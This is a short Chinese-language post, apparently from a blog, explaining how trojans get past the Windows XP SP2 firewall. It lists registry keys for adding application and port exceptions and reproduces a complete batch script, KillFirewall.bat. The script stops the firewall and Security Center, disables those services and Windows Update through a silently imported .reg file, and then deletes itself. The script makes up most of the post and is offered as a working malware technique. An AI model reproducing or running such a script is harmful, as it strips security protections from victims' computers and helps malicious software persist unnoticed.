木馬繞過 Windows XP SP2 防火牆的方法
其實內建防火牆可以簡單的用 net stop 來加以 Disable。
進而修改以下的機碼(增加例外):
Application Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileAuthorizedApplicationsList
Port Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileGloballyOpenPortsList
這裡附上一個批次檔(來自 GovernmentSecurity.org討論區):
KillFirewall.bat
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0
發佈留言
很抱歉,必須登入網站才能發佈留言。